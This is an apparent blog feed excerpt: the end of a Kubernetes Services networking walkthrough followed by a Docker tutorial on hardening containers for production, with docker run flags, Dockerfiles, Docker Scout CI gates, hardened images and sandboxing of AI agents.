nginx-fd956d49d<span class="hljs-number">-49779</span>   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>   service-demo-worker2
nginx-fd956d49d<span class="hljs-number">-5</span>pbsm   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>   service-demo-worker
nginx-fd956d49d-g94jr   <span class="hljs-number">1</span>/<span class="hljs-number">1</span>     Running   <span class="hljs-number">0</span>          <span class="hljs-number">12</span>s   <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>   service-demo-worker3

$ kubectl apply -f my-service.yaml
service/my-service created

$ kubectl get svc my-service
NAME         TYPE        CLUSTER-IP     EXTERNAL-IP   PORT(S)   AGE
my-service   ClusterIP   <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>   &lt;none&gt;        <span class="hljs-number">80</span>/TCP    <span class="hljs-number">2</span>s
</code></pre><p>The Service has no pod IPs in its spec, only its own ClusterIP and the selector:</p>
<pre><code>$ kubectl get svc my-service -o yaml | grep -A <span class="hljs-number">8</span> spec:
spec:
  clusterIP: <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>
  <span class="hljs-attr">internalTrafficPolicy</span>: Cluster
  <span class="hljs-attr">ipFamilies</span>:
  - IPv4
  <span class="hljs-attr">ipFamilyPolicy</span>: SingleStack
  <span class="hljs-attr">ports</span>:
  - port: <span class="hljs-number">80</span>
  <span class="hljs-attr">selector</span>:
    app: nginx
</code></pre><p>The 1.33+ <code>IPAddress</code> object shows it as a first-class allocation:</p>
<pre><code>$ kubectl get ipaddresses
NAME           PARENTREF
<span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>   services/<span class="hljs-keyword">default</span>/my-service
</code></pre><p>The EndpointSlice has the real backend IPs:</p>
<pre><code>$ kubectl get endpointslices -l kubernetes.io/service-name=my-service
NAME               ADDRESSTYPE   PORTS   ENDPOINTS                            AGE
my-service-x29k9   IPv4          <span class="hljs-number">80</span>      <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>     <span class="hljs-number">8</span>s
</code></pre><p>And the iptables rules on a worker show the chain we described:</p>
<pre><code>$ docker exec service-demo-worker iptables-save | grep my-service
-A KUBE-SERVICES -d <span class="hljs-number">10.96</span><span class="hljs-number">.255</span><span class="hljs-number">.20</span>/<span class="hljs-number">32</span> -p tcp -m tcp --dport <span class="hljs-number">80</span> -j KUBE-SVC-FXIYY6OHUSNBITIX
-A KUBE-SVC-FXIYY6OHUSNBITIX -m statistic --mode random --probability <span class="hljs-number">0.33333333349</span> -j KUBE-SEP<span class="hljs-number">-4</span>B2TTHBRUYTSCT32
-A KUBE-SVC-FXIYY6OHUSNBITIX -m statistic --mode random --probability <span class="hljs-number">0.50000000000</span> -j KUBE-SEP-FAW7RO5CDYGWP4Y3
-A KUBE-SVC-FXIYY6OHUSNBITIX -j KUBE-SEP<span class="hljs-number">-4</span>UWZBYSYCGDXTWU5
-A KUBE-SEP<span class="hljs-number">-4</span>B2TTHBRUYTSCT32 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
-A KUBE-SEP-FAW7RO5CDYGWP4Y3 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
-A KUBE-SEP<span class="hljs-number">-4</span>UWZBYSYCGDXTWU5 -j DNAT --to-destination <span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span>:<span class="hljs-number">80</span>
</code></pre><p>Real ClusterIP. Real chain hash. Real probabilities. Real pod IPs. The math (<code>0.33333</code>, <code>0.50000</code>, fallthrough) is exactly what we derived earlier.</p>
<p>Now <code>curl</code> from inside the cluster:</p>
<pre><code>$ kubectl run curl --rm -i --restart=Never --image=busybox:<span class="hljs-number">1.36</span> -- wget -q -O - http:<span class="hljs-comment">//my-service</span>
&lt;!DOCTYPE html&gt;
<span class="xml"><span class="hljs-tag">&lt;<span class="hljs-name">html</span>&gt;</span>
<span class="hljs-tag">&lt;<span class="hljs-name">head</span>&gt;</span><span class="hljs-tag">&lt;<span class="hljs-name">title</span>&gt;</span>Welcome to nginx!<span class="hljs-tag">&lt;/<span class="hljs-name">title</span>&gt;</span><span class="hljs-tag">&lt;/<span class="hljs-name">head</span>&gt;</span>
...</span>
</code></pre><p>Welcome to nginx. The pod knew nothing about iptables, KUBE-SVC chains, DNAT, or conntrack. It just curled <code>my-service</code> and got a response.</p>
<p>Scale up to ten replicas, watch everything reprogram in real time:</p>
<pre><code>$ kubectl scale deploy/nginx --replicas=<span class="hljs-number">10</span>
deployment.apps/nginx scaled

$ kubectl get endpointslices -l kubernetes.io/service-name=my-service
NAME               ADDRESSTYPE   PORTS   ENDPOINTS                                      AGE
my-service-x29k9   IPv4          <span class="hljs-number">80</span>      <span class="hljs-number">10.244</span><span class="hljs-number">.1</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.2</span><span class="hljs-number">.2</span>,<span class="hljs-number">10.244</span><span class="hljs-number">.3</span><span class="hljs-number">.2</span> + <span class="hljs-number">7</span> more...   <span class="hljs-number">1</span>m42s

$ docker exec service-demo-worker iptables-save | grep -c <span class="hljs-string">'KUBE-SVC-FXIYY.*statistic'</span>
<span class="hljs-number">9</span>
</code></pre><p>Three rules became ten: nine carry <code>--probability</code>, and the tenth backend is the unconditional fallthrough. From <code>kubectl scale</code> to all kube-proxies reprogrammed: about 200 milliseconds.</p>
<h2 id="heading-three-takeaways">Three takeaways</h2>
<ol>
<li><p><strong>The Service object is metadata. The dataplane is the kernel.</strong> Nothing in the Service object knows about pod IPs. The kernel's iptables (or nftables) rules carry that mapping. When you understand this, you stop thinking of Services as magic and start thinking of them as cleverly placed netfilter rules.</p>
</li>
<li><p><strong>EndpointSlice is the bridge.</strong> When a Pod becomes Ready, the EndpointSlice controller writes its IP. kube-proxy reads. The kernel obeys. Three controllers, no shared state, all eventually consistent — and reprogramming completes in milliseconds even on big clusters.</p>
</li>
<li><p><strong>Use the right Service type for the job.</strong> ClusterIP for internal traffic. NodePort for dev clusters. LoadBalancer for public production. ExternalName to alias external services. Headless for StatefulSets. Most teams over-use LoadBalancer when ClusterIP-plus-Ingress would have been the right choice.</p>
</li>
</ol>
<h2 id="heading-where-to-go-from-here">Where to go from here</h2>
<p>The full video walks the 5-part flow in 10 minutes with animated visuals for each step. Link at the top of this post.</p>
<p>Sources for every claim in this post:</p>
<ul>
<li><code>pkg/registry/core/service/storage/alloc.go</code> — ClusterIP allocator</li>
<li><code>pkg/controller/endpointslice/</code> — EndpointSlice controller</li>
<li><code>pkg/proxy/iptables/proxier.go</code> — kube-proxy iptables rules</li>
<li><code>pkg/proxy/nftables/</code> — nftables backend (GA 1.33)</li>
<li>KEP-1880 — MultiCIDRServiceAllocator (ServiceCIDR objects)</li>
<li>KEP-3866 — kube-proxy nftables backend</li>
<li>KEP-4974 — Endpoints API deprecation</li>
<li>The terminal output above is verbatim from a real Kubernetes 1.35.1 kind cluster, captured for this post.</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Day 7: Ship It - and What Comes Next]]></title><description><![CDATA[7 Days of Docker (2026) - The Finale. A Docker Captain's guide. Not your average tutorial.

Your container is probably not safe to ship.
I know that sounds harsh after six days of building. You have i]]></description><link>https://blog.kubesimplify.com/day-7-ship-it-and-what-comes-next</link><guid isPermaLink="true">https://blog.kubesimplify.com/day-7-ship-it-and-what-comes-next</guid><category><![CDATA[Docker]]></category><category><![CDATA[Security]]></category><category><![CDATA[docker scout]]></category><category><![CDATA[Devops]]></category><category><![CDATA[hardenedimages]]></category><category><![CDATA[LearnDocker]]></category><category><![CDATA[DockerCaptain]]></category><category><![CDATA[production-ready]]></category><category><![CDATA[cloud native]]></category><dc:creator><![CDATA[Saloni Narang]]></dc:creator><pubDate>Mon, 04 May 2026 05:35:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/08b1aba6-a3e8-43ee-b05e-5a27414ba94b.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong>7 Days of Docker (2026)</strong> - The Finale. A Docker Captain's guide. Not your average tutorial.</p>
</blockquote>
<p>Your container is probably not safe to ship.</p>
<p>I know that sounds harsh after six days of building. You have images, Dockerfiles, multi-stage builds, Compose stacks - real skills. But here is the uncomfortable truth: everything we built in Days 1 through 6 was optimized for <em>working</em>. Today we optimize for <em>not getting breached</em>.</p>
<p>This is the part of Docker that separates side projects from production systems. The part most tutorials skip entirely. The part I wish someone had drilled into me before I shipped my first container to a real cluster.</p>
<p>Let's fix every container you have ever built.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/b686cc9f-bebb-4762-ac20-122a55867087.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Your Container Runs as Root. That's a Problem.</h2>
<p>By default, a Docker container runs as root unless the image or the <code>docker run</code> command sets a different user. Not "sort of root." Not "sandboxed root." Root. UID 0. The same identity that owns every file on a Linux system.</p>
<p>Why does this matter? Because container isolation is not perfect. Kernel exploits exist. Misconfigurations happen. If an attacker escapes a container running as root, they land on the host as root. Game over. Your entire machine - every other container, every secret, every volume - is theirs.</p>
<p>The fix is embarrassingly simple:</p>
<pre><code class="language-bash">$ docker run --rm --user 1000:1000 alpine id
uid=1000 gid=1000 groups=1000
</code></pre>
<p>That is it. One flag. The process now runs as an unprivileged user. In production Dockerfiles, you bake this in permanently:</p>
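<pre><code class="language-dockerfile">FROM node:20-alpine
# Create an unprivileged system user and group for the app
RUN addgroup -S appgroup &amp;&amp; adduser -S appuser -G appgroup
WORKDIR /app
# Copy the app (assumes server.js is in the build context), owned by appuser
COPY --chown=appuser:appgroup . .
# Everything from here on, including the runtime process, runs as appuser
USER appuser
CMD ["node", "server.js"]
</code></pre>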
<p>After <code>USER appuser</code>, every subsequent instruction and the runtime process itself run as that user. No root. No exceptions.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> "But my app needs to bind to port 80!" No, it does not. Bind to port 3000 or 8080 inside the container, then map it to whatever port you want on the host with <code>-p 80:3000</code>. Needing port 80 inside the container is not a reason to run as root - it is a sign your architecture needs rethinking.</p>
</blockquote>
<hr />
<h2>Read-Only Filesystem: If They Can't Write, They Can't Attack</h2>
<p>A writable filesystem inside a container means an attacker can drop malware, modify binaries, or plant a reverse shell. A read-only filesystem shuts all of that down:</p>
<pre><code class="language-bash">$ docker run --rm --read-only alpine sh -c "echo test &gt; /file"
sh: can't create /file: Read-only file system
</code></pre>
<p>The write was blocked by the kernel. Nothing gets through. But your app probably needs to write <em>somewhere</em> - temp files, logs, PID files. The answer is <code>--tmpfs</code>, which mounts a writable in-memory filesystem at a specific path:</p>
<pre><code class="language-bash">docker run --rm --read-only --tmpfs /tmp alpine sh -c "echo test &gt; /tmp/file &amp;&amp; echo 'OK'"
</code></pre>
<p>The root filesystem stays immutable. <code>/tmp</code> is writable but exists only in RAM and vanishes when the container stops. Attackers cannot persist anything.</p>
<hr />
<h2>Resource Limits: Because Runaway Containers Kill Hosts</h2>
<p>Without limits, a single container with a memory leak or a fork bomb can starve every other process on the machine - including your other containers. Docker uses Linux cgroups to enforce hard boundaries:</p>
<pre><code class="language-bash">$ docker run --rm --memory=128m alpine cat /sys/fs/cgroup/memory.max
134217728
</code></pre>
<p>That is exactly 128 MB (128 x 1024 x 1024 = 134,217,728 bytes). If the process exceeds this, the kernel OOM-kills it. Not "warns it." Kills it. That is the correct behavior - a container that violates its resource contract should die, not drag down the host.</p>
<table>
<thead>
<tr>
<th>Flag</th>
<th>What It Enforces</th>
</tr>
</thead>
<tbody><tr>
<td><code>--memory=128m</code></td>
<td>Hard memory ceiling. OOM-kill on breach.</td>
</tr>
<tr>
<td><code>--cpus=0.5</code></td>
<td>CPU throttling. Container gets half a core.</td>
</tr>
<tr>
<td><code>--pids-limit=50</code></td>
<td>Max process count. Prevents fork bombs.</td>
</tr>
</tbody></table>
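<p>If you want to sanity-check what a limit string turns into before reading it back from the cgroup file, the arithmetic is easy to reproduce. This is a minimal sketch: <code>size_to_bytes</code> is a hypothetical helper, not part of Docker, and it assumes the binary (1024-based) units shown in the calculation above.</p>
<pre><code class="language-python"># Hypothetical helper: convert a Docker-style size string ("128m", "1g") to bytes.
# Assumes 1024-based units, matching the 128 x 1024 x 1024 calculation above.
UNITS = {"b": 1, "k": 1024, "m": 1024 ** 2, "g": 1024 ** 3}


def size_to_bytes(size):
    size = size.strip().lower()
    if size[-1] in UNITS:
        return int(size[:-1]) * UNITS[size[-1]]
    return int(size)  # bare number: treated as bytes already


print(size_to_bytes("128m"))  # 134217728
</code></pre>
<p>The printed value should match what <code>memory.max</code> reports inside the container.</p>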
<hr />
<h2>No New Privileges and Capability Dropping</h2>
<p>Two more flags that should be on every production container:</p>
<p><code>--security-opt=no-new-privileges</code> prevents any process inside the container from gaining additional privileges through setuid/setgid binaries. Even if an attacker finds a SUID binary, they cannot escalate.</p>
<p><code>--cap-drop=ALL</code> strips every Linux capability. By default, Docker grants containers a broad set - enough to do things like change file ownership, bind to privileged ports, and manipulate network interfaces. Drop them all, then add back only what you need:</p>
<pre><code class="language-bash">docker run --rm \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --security-opt=no-new-privileges \
  myapp
</code></pre>
<p>This container can bind to privileged ports and nothing else. No changing file ownership. No raw network access. No kernel module loading. The attack surface shrinks dramatically.</p>
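<p>To see what a container actually holds, you can read the <code>CapEff</code> line from <code>/proc/self/status</code> inside it and decode the hex bitmask. The sketch below is illustrative only: <code>decode_caps</code> is a hypothetical helper, the name table is a subset of the bit numbers in <code>linux/capability.h</code>, and the sample masks are assumptions about what you would typically see, not output captured for this post.</p>
<pre><code class="language-python"># Subset of capability bit numbers from linux/capability.h.
# Bits missing from this table are reported as CAP_n.
CAP_NAMES = {
    0: "CHOWN", 1: "DAC_OVERRIDE", 3: "FOWNER", 4: "FSETID", 5: "KILL",
    6: "SETGID", 7: "SETUID", 8: "SETPCAP", 10: "NET_BIND_SERVICE",
    13: "NET_RAW", 18: "SYS_CHROOT", 27: "MKNOD", 29: "AUDIT_WRITE",
    31: "SETFCAP",
}


def decode_caps(hex_mask):
    """Turn a CapEff hex string into a list of capability names."""
    bits = bin(int(hex_mask, 16))[2:]
    return [
        CAP_NAMES.get(pos, "CAP_" + str(pos))
        for pos, flag in enumerate(reversed(bits))
        if flag == "1"
    ]


# Mask you would expect with --cap-drop=ALL --cap-add=NET_BIND_SERVICE (bit 10 only).
print(decode_caps("0000000000000400"))  # ['NET_BIND_SERVICE']
</code></pre>
<p>Running the same function on the mask from a container started without <code>--cap-drop</code> makes the difference obvious: a long list of names instead of one.</p>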
<h3>The Production Run Template</h3>
<p>Putting it all together, here is what a hardened <code>docker run</code> looks like:</p>
<pre><code class="language-bash">docker run -d --name myapp \
  --user 1000:1000 \
  --read-only \
  --tmpfs /tmp \
  --memory=128m \
  --cpus=0.5 \
  --pids-limit=50 \
  --cap-drop=ALL \
  --security-opt=no-new-privileges \
  --restart=unless-stopped \
  -p 8080:3000 \
  myapp:v1.2.3
</code></pre>
<p>Every hardening flag here is a security layer (<code>--restart</code> and <code>-p</code> are operational, not security). Remove any one of them and you open a hole. This is defense in depth - the principle that no single control is enough, but <em>all of them together</em> make a breach extremely difficult.</p>
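<p>Twelve flags are easy to forget by hand. One option is to generate the command from a small helper so the hardened defaults are always present. This is a sketch under assumptions: <code>hardened_run</code> and its parameter names are made up for illustration, and the defaults simply mirror the template above.</p>
<pre><code class="language-python">import shlex


def hardened_run(image, name, user="1000:1000", memory="128m", cpus="0.5",
                 pids_limit=50, publish=None, cap_add=()):
    """Build the argv for a hardened `docker run` (hypothetical helper)."""
    argv = [
        "docker", "run", "-d", "--name", name,
        "--user", user,
        "--read-only",
        "--tmpfs", "/tmp",
        "--memory=" + memory,
        "--cpus=" + cpus,
        "--pids-limit=" + str(pids_limit),
        "--cap-drop=ALL",
    ]
    # Capabilities are opt-in: nothing is added back unless requested.
    argv += ["--cap-add=" + cap for cap in cap_add]
    argv += ["--security-opt=no-new-privileges", "--restart=unless-stopped"]
    if publish:
        argv += ["-p", publish]
    argv.append(image)
    return argv


cmd = hardened_run("myapp:v1.2.3", "myapp", publish="8080:3000")
print(shlex.join(cmd))
</code></pre>
<p>The helper only builds the argument list. Passing <code>cmd</code> to <code>subprocess.run(cmd, check=True)</code> would actually start the container.</p>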
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/3865e9da-2cc3-4386-bb23-162732004020.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Docker Scout as a CI Gate</h2>
<p>Security hardening at runtime is half the battle. The other half is knowing what vulnerabilities are baked into your image <em>before</em> you ship it. Docker Scout scans your images for known CVEs and gives you a blunt summary:</p>
<pre><code class="language-bash">$ docker scout quickview nginx:alpine
 Target             │  nginx:alpine            │    0C     2H     10M     2L     1?
   digest           │  7f7dcd27f920            │
 Base image         │  nginx:1-alpine-slim     │    0C     0H     1M     0L
 Updated base image │  nginx:1.30-alpine-slim  │    0C     0H     1M     0L
</code></pre>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/0d2b31b8-9cb8-43d4-8545-25340ef3afaa.png" alt="" style="display:block;margin:0 auto" />

<p>Read that output. A freshly-pulled <code>nginx:alpine</code> - patched days ago - still has <strong>2 high and 10 medium vulnerabilities</strong>. That is before you add a single line of your own code. Now imagine an image you haven't updated in 3 months. Or 6. The numbers explode.</p>
<p>The image you pick matters more than most of the code you write on top of it.</p>
<p>In CI/CD, Scout becomes a gate. If the scan finds critical or high vulnerabilities, the pipeline fails and the image never reaches production:</p>
<pre><code class="language-yaml"># GitHub Actions - scan before push
- name: Scan for vulnerabilities
  run: |
    docker scout cves myapp:${{ github.sha }} \
      --exit-code \
      --only-severity critical,high
</code></pre>
<p>The <code>--exit-code</code> flag makes Scout return a non-zero exit code when vulnerabilities are found. Your pipeline stops. No humans required.</p>
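<p>If you want your own thresholds or a custom report on top of <code>--exit-code</code>, the severity summary is simple to parse. Treat this as a rough sketch: it assumes the summary column looks like the <code>quickview</code> output shown earlier, which is human-oriented text rather than a stable format, and both function names are hypothetical.</p>
<pre><code class="language-python">import re


def severity_counts(line):
    """Parse the last column of a quickview-style row into severity counts."""
    summary = line.split("│")[-1]  # assumes columns are separated by this box character
    return {label: int(count) for count, label in re.findall(r"(\d+)([CHML?])", summary)}


def gate_passes(counts, blocking=("C", "H")):
    """True only when every blocking severity has a count of zero."""
    return all(counts.get(label, 0) == 0 for label in blocking)


row = " Target             │  nginx:alpine            │    0C     2H     10M     2L     1?"
counts = severity_counts(row)
print(counts)
print(gate_passes(counts))  # False: two high-severity findings
</code></pre>
<p>For anything beyond a quick script, a machine-readable report format is a safer input than scraped terminal output.</p>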
<hr />
<h2>2026's Supply Chain Wake-Up Call</h2>
<p>In March 2026, attackers compromised Aqua Security's CI/CD pipeline and pushed backdoored Trivy scanner images to Docker Hub. The tool meant to FIND vulnerabilities became the attack vector. Thousands of CI/CD pipelines had secrets stolen.</p>
<p>Then in April 2026, it happened again. Attackers used stolen Checkmarx publisher credentials to push malicious images to <code>checkmarx/kics</code> on Docker Hub. Docker caught and quarantined it, but the pattern was clear: a stolen credential, a push through the normal publishing flow, and the attacker is inside the supply chain of every organization that pulls that tag.</p>
<p>This is not hypothetical. This is happening now. And it changes how you should think about every <code>docker pull</code> and every <code>FROM</code> line in your Dockerfiles.</p>
<hr />
<h2>Docker Hardened Images: Fewer CVEs by Default</h2>
<p>Docker recognized that the base image problem is systemic. If every <code>nginx</code>, <code>node</code>, and <code>python</code> image ships with dozens of known vulnerabilities, every developer inherits those vulnerabilities whether they know it or not.</p>
<p>The answer is <strong>Docker Hardened Images</strong> - curated, continuously patched base images with up to 95% fewer CVEs than their standard counterparts. They are free, licensed under Apache 2.0, and available on Docker Hub. Same functionality, dramatically smaller attack surface.</p>
<p>Instead of pulling <code>nginx:alpine</code> with its known vulnerabilities (2 high and 10 medium in the scan above) and hoping for the best, you pull the hardened equivalent and start from a clean baseline. Docker maintains these images with rapid CVE patching - when a vulnerability is disclosed, the hardened image is rebuilt and pushed within days, not weeks.</p>
<p><strong>Docker Hardened Images (DHI)</strong> are not just "fewer CVEs." They are architecturally different:</p>
<ul>
<li><p><strong>Built from source</strong> by Docker with verified provenance</p>
</li>
<li><p><strong>Signed releases</strong> produced through a hardened build pipeline</p>
</li>
<li><p><strong>Rootless</strong> - no root user, ever</p>
</li>
<li><p><strong>Distroless runtime</strong> - stripped of shells, package managers, everything an attacker needs</p>
</li>
<li><p><strong>VEX attestations</strong> - machine-readable statements about which CVEs actually affect the image at runtime</p>
</li>
<li><p><strong>7-day fix guarantee</strong> - new CVE disclosed? Patched image pushed within 7 days</p>
</li>
<li><p><strong>Free and open source</strong> under Apache 2.0. 1,000+ images available.</p>
</li>
</ul>
<p>Here's why DHI matters for the Trivy/KICS attack pattern: those attacks worked because a valid publisher credential could push any tag. With DHI, images are built by Docker from source - the provenance and signatures must match the upstream source, or the image doesn't ship. The attack pattern structurally can't work against DHI.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Most Docker tutorials teach you to pick a base image by size. "Use Alpine, it's small!" Size matters, but CVE count matters more. A 5 MB image with 3 critical vulnerabilities is worse than a 50 MB image with zero. Check <code>docker scout quickview</code> <em>before</em> you write your FROM line. Every time.</p>
</blockquote>
<hr />
<h2>Scout Policies and Attestations</h2>
<p>Docker Scout isn't just <code>quickview</code> anymore. In 2026, it has a full policy engine:</p>
<ul>
<li><p><strong>Configurable policies</strong> - set severity thresholds, define what "compliant" means for your org</p>
</li>
<li><p><strong>Supply chain attestations policy</strong> - flags images that lack SBOM or provenance attestations</p>
</li>
<li><p><strong>CI gate</strong> - fail pipelines when policies are violated, not just when CVEs exist</p>
</li>
<li><p><strong>SBOM generation</strong> - CycloneDX and SPDX formats, attached as attestations to your images</p>
</li>
</ul>
<pre><code class="language-yaml"># GitHub Actions - policy-based gate, not just CVE count
- name: Check Scout policies
  run: |
    docker scout policy myapp:${{ github.sha }} \
      --exit-code \
      --org my-org
</code></pre>
<p>This is a shift from "scan and hope" to "define policy, enforce automatically."</p>
<hr />
<h2>Docker Sandboxes: Isolating AI Agents</h2>
<p>If you're running AI coding agents (Claude Code, Codex, Copilot, Gemini CLI), Day 6's Model Runner gives them intelligence. But intelligence without guardrails is dangerous.</p>
<p>Docker Sandboxes run each agent session inside a dedicated <strong>MicroVM</strong> - not a container, an actual virtual machine with its own kernel and private Docker daemon. The agent can clone repos, run tests, build images, execute arbitrary code - all inside a disposable environment with no path back to your host.</p>
<pre><code class="language-bash">brew install docker/tap/sbx
</code></pre>
<p>This is not "a container with extra flags." It's VM-grade isolation:</p>
<ul>
<li><p>Each session gets its own kernel (hardware boundary, not just namespace boundary)</p>
</li>
<li><p>Private Docker daemon inside the MicroVM (no socket mounting, no host privileges)</p>
</li>
<li><p>File access, network policies, and secrets defined before the agent runs</p>
</li>
<li><p>Disposable by design - delete and start fresh in seconds</p>
</li>
</ul>
<blockquote>
<p><strong>What Nobody Tells You:</strong> An LLM deciding its own security boundaries is not a security model. If your agent's system prompt says "don't delete files" - that's a suggestion, not enforcement. The bounding box has to come from infrastructure, not from a prompt. That's what Sandboxes provide.</p>
</blockquote>
<hr />
<h2>Your 7-Day Journey</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5f0f325b2259ec1c14c4c49a/069660bc-4837-4ab3-b3f5-a9793d479b69.png" alt="" style="display:block;margin:0 auto" />

<p>Let's look back at how far you have come.</p>
<p><a href="https://blog.kubesimplify.com/day-1-what-actually-happens-when-you-type-docker-run"><strong>Day 1: Containers are processes.</strong></a> Not VMs. Not sandboxes. Linux processes restricted by namespaces (what they can see) and cgroups (what they can use). One kernel, many isolated process trees. This mental model underpins everything.</p>
<p><a href="https://blog.kubesimplify.com/day-2-your-images-are-a-supply-chain-and-it-s-probably-broken"><strong>Day 2: Images are supply chain artifacts</strong></a><strong>.</strong> Layers, manifests, content-addressed digests. Tags are mutable pointers; digests are immutable truth. Your image is a graph of filesystem snapshots, and every dependency in that graph is a potential attack vector.</p>
<p><a href="https://blog.kubesimplify.com/day-3-stop-writing-dockerfiles-from-scratch"><strong>Day 3: Dockerfiles,</strong> <code>docker init</code><strong>, and multi-stage builds.</strong></a> You stopped writing Dockerfiles from scratch and started generating them. Multi-stage builds cut your image sizes by 10x by separating build dependencies from runtime.</p>
<p><a href="https://blog.kubesimplify.com/day-4-breaking-isolation-on-purpose-volumes-networks-and-the-real-world"><strong>Day 4: Breaking isolation on purpose</strong></a><strong>.</strong> Volumes break filesystem isolation (data survives containers). Networks break network isolation (containers talk by name via DNS). Port mapping breaks host isolation (the outside world reaches in). One coherent story about carefully poking holes in container isolation.</p>
<p><a href="https://blog.kubesimplify.com/day-5-docker-compose-how-docker-actually-gets-used"><strong>Day 5: Docker Compose for real workflows</strong></a><strong>.</strong> One YAML file, one command, an entire application stack. Services, networks, volumes, dependency ordering - all declarative, all version-controlled. Nobody types <code>docker run</code> with 15 flags in real life.</p>
<p><a href="https://blog.kubesimplify.com/day-6-run-an-llm-on-your-laptop-with-docker"><strong>Day 6: Docker + AI.</strong></a> You pulled an LLM from Docker Hub, ran it locally with Metal GPU acceleration, hit it with an OpenAI-compatible API, and built a real AI-powered Flask app with Compose. Docker Model Runner, Gordon, MCP Toolkit - Docker is now an AI development platform.</p>
<p><strong>Day 7: Production security.</strong> Non-root users, read-only filesystems, resource limits, capability dropping, vulnerability scanning, hardened images. The difference between "it runs" and "it's safe to ship."</p>
<p>You went from <code>docker run hello-world</code> to hardened, scanned, resource-limited production containers in seven days. That is not trivial. That is a real foundation.</p>
<hr />
<h2>Where Docker Ends</h2>
<p>Docker builds containers. It does not run them at scale. And that is fine - it was never meant to.</p>
<p>Kubernetes is where containers go when they outgrow a single machine. Pod scheduling, auto-scaling, rolling deployments, service meshes, ingress controllers - that is K8s territory. Start with kind or minikube locally, then move to managed services (EKS, GKE, AKS). Everything you learned about images, Dockerfiles, and Compose translates directly. K8s runs the same OCI images you have been building all week.</p>
<p>Getting started with Kubernetes is easy: we have multiple courses, starting with this one.</p>
<p><a class="embed-card" href="https://youtu.be/EV47Oxwet6Y?si=Hw69DkBc3MolinUy">https://youtu.be/EV47Oxwet6Y?si=Hw69DkBc3MolinUy</a></p>

<p>Testcontainers is where Docker meets testing. Spin up real databases, message brokers, and services as throwaway containers inside your test suite. Your integration tests run against real infrastructure, not mocks. It uses Docker under the hood, so everything you know applies.</p>
<p>Apple Containers is Apple's take on a container runtime - one lightweight VM per container instead of Docker's shared-VM model. Sub-second boot times, stronger isolation, written in Swift. It is interesting for macOS-native workflows, but Docker remains the standard for production and CI/CD.</p>
<blockquote>
<p><strong>What Nobody Tells You:</strong> Docker is not competing with Kubernetes. Docker builds. Kubernetes runs at scale. They are complementary tools, not alternatives. K8s clusters run the same OCI images that Docker builds, and the CI/CD pipelines that feed them commonly use Docker to build and scan. Learn both. In that order. Docker first - because you cannot orchestrate what you cannot build.</p>
</blockquote>
<hr />
<h2>The Production Checklist</h2>
<p>Before you ship any container, run through this:</p>
<pre><code class="language-plaintext">[ ] Non-root USER in Dockerfile
[ ] --read-only filesystem + --tmpfs where needed
[ ] --memory and --cpus limits set
[ ] --cap-drop=ALL + selective --cap-add
[ ] --security-opt=no-new-privileges
[ ] docker scout quickview - zero critical, zero high
[ ] Hardened base image or patched base image
[ ] HEALTHCHECK in Dockerfile
[ ] Log rotation configured (--log-opt max-size, max-file)
[ ] Image tagged with git SHA, not just :latest
[ ] Secrets in mounted files or external vault - never in ENV or layers
</code></pre>
<p>If you cannot check every box, you are not ready to ship. Go back and fix it. The checklist is not optional - it is the minimum.</p>
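<p>Several of the runtime boxes can be checked mechanically from <code>docker inspect</code> output. Here is a minimal sketch, assuming the usual <code>Config</code> and <code>HostConfig</code> field names in that JSON. The <code>audit</code> function and the sample data are hypothetical, and the remaining items (scanning, tagging, secrets, health checks) still need their own checks.</p>
<pre><code class="language-python">import json


def audit(entry):
    """Return the checklist items that one `docker inspect` entry fails."""
    config = entry.get("Config", {})
    host = entry.get("HostConfig", {})
    checks = {
        "non-root user": config.get("User", "") not in ("", "0", "root", "0:0"),
        "read-only rootfs": host.get("ReadonlyRootfs") is True,
        "memory limit": (host.get("Memory") or 0) != 0,
        "cpu limit": (host.get("NanoCpus") or 0) != 0,
        "cap-drop ALL": "ALL" in (host.get("CapDrop") or []),
        "no-new-privileges": any(
            opt.startswith("no-new-privileges")
            for opt in (host.get("SecurityOpt") or [])
        ),
    }
    return [name for name, ok in checks.items() if not ok]


# Hand-written sample shaped like one element of `docker inspect` output.
sample = json.loads("""
{"Config": {"User": "1000:1000"},
 "HostConfig": {"ReadonlyRootfs": true, "Memory": 134217728,
                "NanoCpus": 500000000, "CapDrop": ["ALL"],
                "SecurityOpt": ["no-new-privileges"]}}
""")
print(audit(sample))  # []
</code></pre>
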